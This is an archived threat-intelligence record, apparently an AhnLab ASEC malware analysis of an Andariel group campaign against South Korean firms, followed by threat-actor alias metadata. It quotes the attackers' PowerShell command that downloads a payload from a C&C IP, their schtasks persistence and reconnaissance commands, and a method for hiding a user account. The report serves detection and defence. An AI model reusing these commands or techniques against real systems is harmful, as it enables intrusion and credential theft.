{
	"id": "3e086bb2-bb91-45bb-8196-7196a2bbd5c4",
	"created_at": "2026-04-06T00:13:32.590106Z",
	"updated_at": "2026-04-10T13:12:33.768139Z",
	"deleted_at": null,
	"sha1_hash": "4a7154b6411b812d13450055fdde2c6cef1b80ab",
	"title": "Circumstances of an Attack Exploiting an Asset Management Program (Andariel Group)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 803878,
	"plain_text": "Circumstances of an Attack Exploiting an Asset Management\r\nProgram (Andariel Group)\r\nBy ATCP\r\nPublished: 2023-11-09 · Archived: 2026-04-05 21:09:20 UTC\r\nThe ASEC analysis team identified the circumstances of the Andariel group distributing malware via an attack\r\nusing a certain asset management program. The Andariel group is known to be in a cooperative relationship with\r\nor a subsidiary organization of the Lazarus group.\r\nThe Andariel group usually launches spear phishing, watering hole, or supply chain attacks for initial penetration.\r\nThere is also a case where the group exploited a central management solution during the malware installation\r\nprocess. Recently, the Andariel group has been exploiting vulnerabilities in many programs such as Log4Shell and\r\nInnorix Agent to attack targets in various corporate sectors in South Korea. [1]\r\nAnother asset management program was used in the recently identified attack. Additionally, an attack targeting\r\nMS-SQL Server was also identified at the same time. Malware strains installed through these attacks include not\r\nonly TigerRat, but also various other types such as NukeSped variants, Black RAT, and Lilith RAT, an open-source malware strain. The attack targets were found to be South Korean communications companies and\r\nsemiconductor manufacturers, similar to those in previous cases of attacks.\r\n1. Initial Penetration\r\nAhnLab Smart Defense (ASD) recently detected logs of a certain South Korean asset management program\r\nhaving installed the Andariel group’s malware. But of course, it cannot be determined from these logs alone\r\nwhether these signify an attack that takes advantage of a vulnerability or a simple exploit. The asset management\r\nprogram running in the target system ultimately used the following PowerShell command to download the\r\nmalware.\r\nFigure 1. 
Malware downloaded using an asset management program\r\nhttps://asec.ahnlab.com/en/59073/\r\nPage 1 of 13\n\nPowerShell command: wget hxxp://109.248.150[.]147:8585/load.png -outfile C:\\Users\\public\\credis.exe\r\nBesides PowerShell, the Andariel group also used the mshta.exe process to download malware. The following is HTML malware uploaded to the C\u0026C URL; it is responsible for downloading other malware strains of the Andariel group, such as TigerRat.\r\nFigure 2. Downloader script\r\nIn previous attack cases, the Andariel group used Innorix Agent and spear phishing attacks together. A notable fact about the recent attacks is that there are cases where malware was installed through MS-SQL Server. It is presumed that the threat actor attacked poorly managed MS-SQL servers and installed NukeSped. The presumption is based on the fact that malware strains such as Remcos RAT and Mallox ransomware are also usually installed through attacks against MS-SQL servers whose account credentials are vulnerable to brute force or dictionary attacks, and also on the fact that there are logs of other threat actors’ past attempts to install such malware strains on the system. Thus, it seems that the Andariel group has also been using poorly managed MS-SQL servers as an attack vector recently.\r\nFigure 3. NukeSped being installed through MS-SQL Server\r\nSimilar to other attacks that target MS-SQL Server, PrintSpoofer was used for privilege escalation during the attack process.\r\nFigure 4. PrintSpoofer privilege escalation malware also used in the attack against MS-SQL Server\r\n2. Malware Used in Attacks\r\nBackdoors installed through the attacks above include TigerRat, a major malware strain used by the Andariel group, as well as Black RAT and variants of NukeSped. 
These malware strains are almost identical to those of previous attacks, but the open-source malware Lilith RAT was used in the recent attacks. Additionally, in line with the Andariel group’s recent tendency to use malware developed in the Go language, a downloader malware developed in Go was also discovered.\r\n2.1. TigerRat\r\nThe malware installed through the South Korean asset management program was TigerRat. The Andariel group has been using TigerRat in most of its attacks against South Korean targets, including watering hole attacks and attacks exploiting the Log4Shell vulnerability. [2] TigerRat is a backdoor that supports various features such as uploading and downloading files, executing commands, collecting basic information, keylogging, taking screenshots, and port forwarding.\r\nA difference from other ordinary backdoors is that there is an authentication process during initial communications with the C\u0026C server in which a certain string must be sent and received. Like the types identified in 2023, random strings 0x20 bytes in size were used in the authentication of TigerRat in the recent attacks. These strings are deemed to be the MD5 hashes of “fool” (dd7b696b96434d2bf07b34f9c125d51d) and “iwan” (01ccce480c60fcdb67b54f4509ffdb56).\r\nFigure 5. Strings used in authentication with the C\u0026C server\r\nC\u0026C request string: dd7b696b96434d2bf07b34f9c125d51d\r\nC\u0026C response string: 01ccce480c60fcdb67b54f4509ffdb56\r\n2.2. Golang Downloader\r\nThe Andariel group has been creating and using various backdoors in the Go language since around 2023. Black RAT, Goat RAT, and DurianBeacon were used in previous cases, and a downloader developed in Go was used in the recent attacks. This malware has a simple structure that connects to the C\u0026C server and installs an additional payload. 
A notable characteristic is that it uses Base64 encoding during communications with the C\u0026C server.\r\nFigure 6. The downloader malware’s Base64 decoding routine\r\nNot only did the threat actor exploit the South Korean asset management program to install TigerRat directly, but they also employed the method of installing the Golang downloader, which in turn installed an additional payload. Malware installed through the Golang downloader includes TigerRat and variants of NukeSped.\r\n2.3. NukeSped Variants\r\nNukeSped is a backdoor that can receive commands from the C\u0026C server and control the infected system. Among the NukeSped variants used in the attacks, Type 1 sends a packet using the POST method during initial communications with the C\u0026C server and then sends the results of the commands received from the C\u0026C server through the GET method, disguised as the behavior of visiting Google.\r\nFigure 7. C\u0026C communications packet\r\nAnother NukeSped variant was identified in the attack process. While it has a small size of 23 KB, the string used for auto-deletion is similar to that of past NukeSped variants.\r\nFigure 8. NukeSped’s string\r\n2.4. Black RAT\r\nBlack RAT is a backdoor developed in the Go language and was first identified in an attack by the Andariel group in 2023. While no source code information is included in the Black RAT used in the recent attacks, it could be identified by the fact that its function names were almost identical to those of the Black RAT seen in the past.\r\nFigure 9. List of Black RAT’s functions\r\n2.5. Lilith RAT\r\nLilith RAT is an open-source RAT malware published on GitHub. 
It was developed in C++ and provides various features for controlling the infected system such as remote code execution, maintaining persistence, and self-deletion.\r\nFigure 10. Lilith RAT’s GitHub page\r\nThe Lilith RAT used by the Andariel group in its attacks has a significant portion of the strings in its binary encrypted. This is deemed to be for the purpose of evading file-based detection. However, not all strings are encrypted, and some strings are the same as those in Lilith RAT’s source code.\r\nFigure 11. Strings in Lilith RAT\r\n2.6. Adding a User Account\r\nAside from controlling the infected system using backdoors, the threat actor also added a user account to the system and concealed it. This task was performed using a malware strain the threat actor developed. Because this malware runs properly only when a certain user account already exists in the infected system, the addition of a user account signifies that the threat actor has already gained control over the system.\r\nFigure 12. The routine that diverges depending on the existence of a certain user\r\nOrdinarily, the reason why a threat actor adds a user account even when they can control the infected system using a backdoor is to use Remote Desktop to control the target in a GUI environment and to maintain persistence afterward. However, if an account is simply added without any other steps, a system user can notice the newly created user account upon login.\r\nFor this reason, the malware goes through the following process to prevent the user from noticing. First, the account is created with the sign “$” appended to the name. Then, a part of the SAM data of an existing user is copied and overwritten onto the created “black$” account. 
If the existing user is an admin account and permitted to use Remote Desktop, the “black$” account also obtains the same properties.\r\nFor reference, malware strains used by the Kimsuky group added the newly created user account to the admin group and also to SpecialAccounts, enabling the account in firewalls. [3] This process can easily be detected by security products, but the Andariel group characteristically used the aforementioned malware to add a concealed account without that additional step.\r\nFigure 13. Kimsuky group’s malware that adds and conceals a user account\r\n3. Post Infection\r\nAfter installing the backdoor, the threat actor ran the following commands and registered them in the task scheduler to maintain persistence.\r\nFigure 14. Commands executed by the threat actor\r\n\u003e schtasks /delete /tn “microsoft\\******” /f\r\n\u003e schtasks /create /tn “microsoft\\******” /tr “c:\\users\\%ASD%\\credis.exe” /sc onlogon /ru system\r\n\u003e schtasks /run /tn “microsoft\\windows\\mui\\route”\r\nAfterward, the following commands were used to look up information on the infected system.\r\n\u003e cmd.exe /c “query user”\r\n\u003e cmd.exe /c “ipconfig”\r\n\u003e cmd.exe /c “whoami”\r\n\u003e cmd.exe /c “cmdkey /list”\r\n\u003e cmd.exe /c “netsat -nao | findstr 445”\r\nBesides the commands above, there were other commands that removed the downloader malware or terminated other processes.\r\n\u003e cmd.exe /c “del /f c:\\users\\%ASD%\\perf.exe”\r\n\u003e taskkill /f /pid 15036\r\nIn addition to using the backdoor to collect information, the threat actor also downloaded and used hacking tools such as NirSoft’s CredentialsFileView and Network Password Recovery. These tools show account credentials saved in the infected system as well as account credentials for shared folders. 
These can be used in the future for lateral movement within the network of the organization to which the affected system belongs.\r\nFigure 15. Netpass downloaded and executed after malware infection\r\n4. Conclusion\r\nThe Andariel group is one of the threat groups that are highly active in South Korea, alongside the Kimsuky and Lazarus groups. The group initially launched attacks to acquire information related to national security, but now it also attacks for financial gain. [4] It is known to use spear phishing or watering hole attacks, and it also exploits vulnerabilities in software during initial penetration. There have also been circumstances of the Andariel group exploiting other vulnerabilities during the attack process to distribute malware.\r\nIn recently discovered attack cases, the group seems to be using various programs, such as asset management software within companies, for supply chain attacks, in addition to launching attacks against vulnerable MS-SQL servers. Users must be particularly cautious of attachments in emails from unknown sources and executable files downloaded from web pages. Security administrators in companies must enhance monitoring of asset management programs and apply patches for any security vulnerabilities in those programs. The latest patches for the OS and programs such as Internet browsers must be applied, and V3 must be updated to the latest version to prevent malware infection in advance.\r\nAhnLab’s anti-malware product V3 detects and blocks malware using the detection names below. 
The IOCs are as follows.\r\nFile Detection\r\n– Malware/Win.Generic.C5528992 (2023.10.25.00)\r\n– Malware/Win.Generic.C5528516 (2023.10.26.00)\r\n– Backdoor/Win.TigerRAT.C5517634 (2023.10.19.03)\r\n– Backdoor/Win.Agent.C5518308 (2023.10.20.00)\r\n– Downloader/HTML.Agent.SC193459 (2023.10.19.03)\r\n– Downloader/HTML.Agent.SC193403 (2023.10.18.01)\r\n– Backdoor/Win.TigerRAT.C5513095 (2023.10.17.03)\r\n– Unwanted/Win.HackTool.C5175443 (2022.06.20.02)\r\n– HackTool/Win.CredentialsFileView (2022.04.20.00)\r\n– Backdoor/Win.Agent.R619279 (2023.11.01.01)\r\n– Backdoor/Win.Agent.C5534745 (2023.11.01.01)\r\n– Backdoor/Win.NukeSped.C5535346 (2023.11.01.03)\r\n– Backdoor/Win.BlackRAT.C5535345 (2023.11.01.03)\r\n– Exploit/Win.PrintSpoofer.C5535350 (2023.11.02.00)\r\nBehavior Detection\r\n– Malware/MDP.Download.M1197\r\nMD5\r\n0414a2ab718d44bf6f7103cff287b312\r\n13b4ce1fc26d400d34ede460a8530d93\r\n232586f8cfe82b80fd0dfa6ed8795c56\r\n33a3da2de78418b89a603e28a1e8852c\r\n3a0c8ae783116c1840740417c4fbe678\r\nURL\r\nhttp[:]//109[.]248[.]150[.]147[:]8080/\r\nhttp[:]//109[.]248[.]150[.]147[:]8443/\r\nhttp[:]//109[.]248[.]150[.]147[:]8585/load[.]html\r\nhttp[:]//109[.]248[.]150[.]147[:]8585/load[.]png\r\nhttp[:]//109[.]248[.]150[.]147[:]8585/view[.]php\r\nAdditional IOCs are available on AhnLab TIP.\r\nSource: https://asec.ahnlab.com/en/59073/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://asec.ahnlab.com/en/59073/"
	],
	"report_names": [
		"59073"
	],
	"threat_actors": [
		{
			"id": "838f6ced-12a4-4893-991a-36d231d96efd",
			"created_at": "2022-10-25T15:50:23.347455Z",
			"updated_at": "2026-04-10T02:00:05.295717Z",
			"deleted_at": null,
			"main_name": "Andariel",
			"aliases": [
				"Andariel",
				"Silent Chollima",
				"PLUTONIUM",
				"Onyx Sleet"
			],
			"source_name": "MITRE:Andariel",
			"tools": [
				"Rifdoor",
				"gh0st RAT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "110e7160-a8cc-4a66-8550-f19f7d418117",
			"created_at": "2023-01-06T13:46:38.427592Z",
			"updated_at": "2026-04-10T02:00:02.969896Z",
			"deleted_at": null,
			"main_name": "Silent Chollima",
			"aliases": [
				"Onyx Sleet",
				"PLUTONIUM",
				"OperationTroy",
				"Guardian of Peace",
				"GOP",
				"WHOis Team",
				"Andariel",
				"Subgroup: Andariel"
			],
			"source_name": "MISPGALAXY:Silent Chollima",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2",
			"created_at": "2022-10-25T15:50:23.280374Z",
			"updated_at": "2026-04-10T02:00:05.305572Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"Kimsuky",
				"Black Banshee",
				"Velvet Chollima",
				"Emerald Sleet",
				"THALLIUM",
				"APT43",
				"TA427",
				"Springtail"
			],
			"source_name": "MITRE:Kimsuky",
			"tools": [
				"Troll Stealer",
				"schtasks",
				"Amadey",
				"GoBear",
				"Brave Prince",
				"CSPY Downloader",
				"gh0st RAT",
				"AppleSeed",
				"Gomir",
				"NOKKI",
				"QuasarRAT",
				"Gold Dragon",
				"PsExec",
				"KGH_SPY",
				"Mimikatz",
				"BabyShark",
				"TRANSLATEXT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "bc6e3644-3249-44f3-a277-354b7966dd1b",
			"created_at": "2022-10-25T16:07:23.760559Z",
			"updated_at": "2026-04-10T02:00:04.741239Z",
			"deleted_at": null,
			"main_name": "Andariel",
			"aliases": [
				"APT 45",
				"Andariel",
				"G0138",
				"Jumpy Pisces",
				"Onyx Sleet",
				"Operation BLACKMINE",
				"Operation BLACKSHEEP/Phase 3.",
				"Operation Blacksmith",
				"Operation DESERTWOLF/Phase 3",
				"Operation GHOSTRAT",
				"Operation GoldenAxe",
				"Operation INITROY/Phase 1",
				"Operation INITROY/Phase 2",
				"Operation Mayday",
				"Operation VANXATM",
				"Operation XEDA",
				"Plutonium",
				"Silent Chollima",
				"Stonefly"
			],
			"source_name": "ETDA:Andariel",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "760f2827-1718-4eed-8234-4027c1346145",
			"created_at": "2023-01-06T13:46:38.670947Z",
			"updated_at": "2026-04-10T02:00:03.062424Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"G0086",
				"Emerald Sleet",
				"THALLIUM",
				"Springtail",
				"Sparkling Pisces",
				"Thallium",
				"Operation Stolen Pencil",
				"APT43",
				"Velvet Chollima",
				"Black Banshee"
			],
			"source_name": "MISPGALAXY:Kimsuky",
			"tools": [
				"xrat",
				"QUASARRAT",
				"RDP Wrapper",
				"TightVNC",
				"BabyShark",
				"RevClient"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d",
			"created_at": "2025-08-07T02:03:25.101147Z",
			"updated_at": "2026-04-10T02:00:03.846812Z",
			"deleted_at": null,
			"main_name": "NICKEL KIMBALL",
			"aliases": [
				"APT43 ",
				"ARCHIPELAGO ",
				"Black Banshee ",
				"Crooked Pisces ",
				"Emerald Sleet ",
				"ITG16 ",
				"Kimsuky ",
				"Larva-24005 ",
				"Opal Sleet ",
				"Ruby Sleet ",
				"SharpTongue ",
				"Sparking Pisces ",
				"Springtail ",
				"TA406 ",
				"TA427 ",
				"THALLIUM ",
				"UAT-5394 ",
				"Velvet Chollima "
			],
			"source_name": "Secureworks:NICKEL KIMBALL",
			"tools": [
				"BabyShark",
				"FastFire",
				"FastSpy",
				"FireViewer",
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "771d9263-076e-4b6e-bd58-92b6555eb739",
			"created_at": "2025-08-07T02:03:25.092436Z",
			"updated_at": "2026-04-10T02:00:03.758541Z",
			"deleted_at": null,
			"main_name": "NICKEL HYATT",
			"aliases": [
				"APT45 ",
				"Andariel",
				"Dark Seoul",
				"Jumpy Pisces ",
				"Onyx Sleet ",
				"RIFLE Campaign",
				"Silent Chollima ",
				"Stonefly ",
				"UN614 "
			],
			"source_name": "Secureworks:NICKEL HYATT",
			"tools": [
				"ActiveX 0-day",
				"DTrack",
				"HazyLoad",
				"HotCriossant",
				"Rifle",
				"UnitBot",
				"Valefor"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "71a1e16c-3ba6-4193-be62-be53527817bc",
			"created_at": "2022-10-25T16:07:23.753455Z",
			"updated_at": "2026-04-10T02:00:04.73769Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"APT 43",
				"Black Banshee",
				"Emerald Sleet",
				"G0086",
				"G0094",
				"ITG16",
				"KTA082",
				"Kimsuky",
				"Larva-24005",
				"Larva-25004",
				"Operation Baby Coin",
				"Operation Covert Stalker",
				"Operation DEEP#DRIVE",
				"Operation DEEP#GOSU",
				"Operation Kabar Cobra",
				"Operation Mystery Baby",
				"Operation Red Salt",
				"Operation Smoke Screen",
				"Operation Stealth Power",
				"Operation Stolen Pencil",
				"SharpTongue",
				"Sparkling Pisces",
				"Springtail",
				"TA406",
				"TA427",
				"Thallium",
				"UAT-5394",
				"Velvet Chollima"
			],
			"source_name": "ETDA:Kimsuky",
			"tools": [
				"AngryRebel",
				"AppleSeed",
				"BITTERSWEET",
				"BabyShark",
				"BoBoStealer",
				"CSPY Downloader",
				"Farfli",
				"FlowerPower",
				"Gh0st RAT",
				"Ghost RAT",
				"Gold Dragon",
				"GoldDragon",
				"GoldStamp",
				"JamBog",
				"KGH Spyware Suite",
				"KGH_SPY",
				"KPortScan",
				"KimJongRAT",
				"Kimsuky",
				"LATEOP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Lovexxx",
				"MailPassView",
				"Mechanical",
				"Mimikatz",
				"MoonPeak",
				"Moudour",
				"MyDogs",
				"Mydoor",
				"Network Password Recovery",
				"PCRat",
				"ProcDump",
				"PsExec",
				"ReconShark",
				"Remote Desktop PassView",
				"SHARPEXT",
				"SWEETDROP",
				"SmallTiger",
				"SniffPass",
				"TODDLERSHARK",
				"TRANSLATEXT",
				"Troll Stealer",
				"TrollAgent",
				"VENOMBITE",
				"WebBrowserPassView",
				"xRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434412,
	"ts_updated_at": 1775826753,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4a7154b6411b812d13450055fdde2c6cef1b80ab.pdf",
		"text": "https://archive.orkl.eu/4a7154b6411b812d13450055fdde2c6cef1b80ab.txt",
		"img": "https://archive.orkl.eu/4a7154b6411b812d13450055fdde2c6cef1b80ab.jpg"
	}
}